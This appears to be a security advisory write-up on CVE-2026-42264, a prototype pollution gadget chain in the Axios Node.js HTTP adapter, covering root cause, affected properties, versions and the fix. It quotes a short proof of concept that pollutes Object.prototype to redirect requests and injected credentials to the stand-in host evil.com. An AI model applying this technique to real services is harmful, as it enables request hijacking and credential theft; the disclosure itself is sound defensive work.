Introduction
Five configuration properties in the Axios HTTP adapter silently inherit attacker controlled values from a polluted Object.prototype, turning every outbound request in a Node.js process into a potential credential leak or redirect to a malicious server. With approximately 100 million weekly npm downloads, this prototype pollution gadget chain in Axios versions 1.0.0 through 1.15.1 (CVE-2026-42264, CVSS 7.4) represents a significant exposure surface for any organization running Node.js services that include third party dependencies capable of polluting prototypes.
Technical Information
Root Cause: Missing hasOwnProperty Guards
The vulnerability stems from an asymmetry in how Axios handles configuration merging versus configuration reading. The mergeConfig() function iterates using Object.keys(), which only returns own enumerable properties. When neither the defaults nor the user supplied configuration explicitly sets the five affected properties, they remain absent from the merged configuration object as own properties.
The HTTP adapter, however, reads these properties via direct property access (e.g., config.auth, config.baseURL). In JavaScript, direct property access traverses the prototype chain. If Object.prototype has been polluted by another dependency in the same process, the adapter silently picks up the attacker controlled values.
An existing own() helper function was already guarding eight other properties from this exact attack pattern. The five vulnerable properties were simply omitted from this protection in versions prior to 1.15.2.
The Five Gadget Properties
Each of the five unguarded properties maps to a concrete abuse path:
| Property | Source Location | Impact |
|---|---|---|
auth | lib/adapters/http.js line 617 | Injects attacker controlled Authorization header on all requests |
baseURL | lib/helpers/resolveConfig.js line 18 | Redirects all requests using relative URLs to an attacker controlled server |
socketPath | lib/adapters/http.js line 669 | Redirects requests to internal Unix sockets (e.g., Docker daemon), enabling SSRF |
beforeRedirect | lib/adapters/http.js line 698 | Executes attacker supplied callback during HTTP redirects |
insecureHTTPParser | lib/adapters/http.js line 712 | Enables Node.js insecure HTTP parser, potentially enabling request smuggling |
Attack Flow
-
Precondition: Another dependency in the same Node.js process performs prototype pollution. This could occur through a vulnerable deep merge utility, query string parser, or similar gadget. The attacker sets properties on
Object.prototypesuch asauth,baseURL, orsocketPath. -
Configuration merge: When an Axios request is initiated,
mergeConfig()builds the final configuration object. BecauseObject.keys()only returns own properties, the polluted keys are not present in the merged config as own properties. -
Adapter reads polluted values: The HTTP adapter accesses
config.auth,config.baseURL, etc. via direct property lookup. JavaScript's prototype chain resolution finds the attacker controlled values onObject.prototype. -
Silent exploitation: Depending on which properties are polluted, the attacker achieves credential injection (via
auth), request redirection (viabaseURL), SSRF to Unix sockets (viasocketPath), arbitrary code execution during redirects (viabeforeRedirect), or HTTP parser weakening (viainsecureHTTPParser). All of this happens silently on every outbound Axios request.
Proof of Concept
A public, vendor published Proof of Concept exists for CVE-2026-42264. It is embedded directly within the official GitHub Security Advisory GHSA-q8qp-cvcw-x6jj, published on April 24, 2026, by the Axios maintainer jasonsaayman.
The following PoC is provided verbatim from the advisory:
const axios = require('axios'); // Prototype pollution from a vulnerable dependency in the same process Object.prototype.auth = { username: 'attacker', password: 'exfil' }; Object.prototype.baseURL = 'https://evil.com'; await axios.get('/api/users'); // Request is sent to: https://evil.com/api/users // With header: Authorization: Basic YXR0YWNrZXI6ZXhmaWw= // Attacker receives both the request and injected credentials
Exploitation mechanics: When another dependency in the same Node.js process performs prototype pollution (e.g., via a deep merge or query string parsing gadget), the attacker sets Object.prototype.auth and/or Object.prototype.baseURL. Because mergeConfig() uses Object.keys({...config1, ...config2}), which only returns own enumerable properties, the polluted keys are absent from the merged config object. However, the HTTP adapter subsequently reads them via direct property access (e.g., config.auth at lib/adapters/http.js line 617), which traverses the prototype chain and retrieves the attacker's values.
Impact demonstrated by the PoC:
- Credential injection: An attacker controlled
Authorization: Basic ...header is silently added to every outbound Axios request. - Request hijacking: All requests using relative URLs are redirected to the attacker's server (
https://evil.com). - Additional gadgets not shown in the minimal PoC but documented in the advisory include: SSRF via
socketPath(redirect to internal Unix sockets, e.g., Docker daemon), arbitrary code execution viabeforeRedirect(attacker supplied callback), and HTTP parser weakening viainsecureHTTPParser(enabling request smuggling).
The fix was merged via PR #10779 (commit 47915144662f2733e6c051bdcb895a8c8f0586aa) on April 20, 2026, into the v1.x branch and released in version 1.15.2.
Affected Systems and Versions
- Package: axios (npm)
- Vulnerable versions: 1.0.0 through 1.15.1 (inclusive)
- Fixed version: 1.15.2
- Affected component: Node.js HTTP adapter (
lib/adapters/http.js) and configuration resolution (lib/helpers/resolveConfig.js) - CWE: CWE-1321 (Improperly Controlled Modification of Object Prototype Attributes, commonly known as Prototype Pollution)
- Precondition: Exploitation requires a separate prototype pollution source in the same Node.js process. This could be any dependency that performs unsafe deep merging, query string parsing, or similar operations on attacker controlled input.
Note that older widely deployed versions such as 1.13.2 remain exposed to these gadget surfaces in the presence of any prototype pollution in the process.
Vendor Security History
Axios has faced notable security challenges in recent months. On March 31, 2026, a supply chain compromise occurred when an attacker gained access to a lead maintainer account and published malicious versions 1.14.1 and 0.30.4. These versions injected a dependency called plain-crypto-js that installed a remote access trojan. Telemetry from Elastic Security Labs confirmed impacted organizations were running the malicious code in production environments.
In response, the Axios team implemented several security improvements: adoption of OpenID Connect trusted publishing, addition of GitHub Actions security scanners, pinning all action references to full commit hashes, and narrowing workflow permissions to least privilege. This response demonstrates a maturing security posture, though the proximity of these two incidents (supply chain compromise in March, prototype pollution disclosure in April/May) underscores the importance of continuous monitoring for Axios updates.
References
- NVD Entry for CVE-2026-42264
- GitHub Security Advisory GHSA-q8qp-cvcw-x6jj
- Fix Commit: 47915144662f2733e6c051bdcb895a8c8f0586aa
- Pull Request #10779: fix: more header pollutions
- Axios Release v1.15.2
- Tenable CVE-2026-42264
- Snyk: axios 1.13.2 Vulnerability Database
- Elastic Security Labs: Inside the Axios Supply Chain Compromise
- Elastic Security Labs: How We Caught the Axios Supply Chain Attack
- Axios Post Mortem: npm Supply Chain Compromise (Issue #10636)



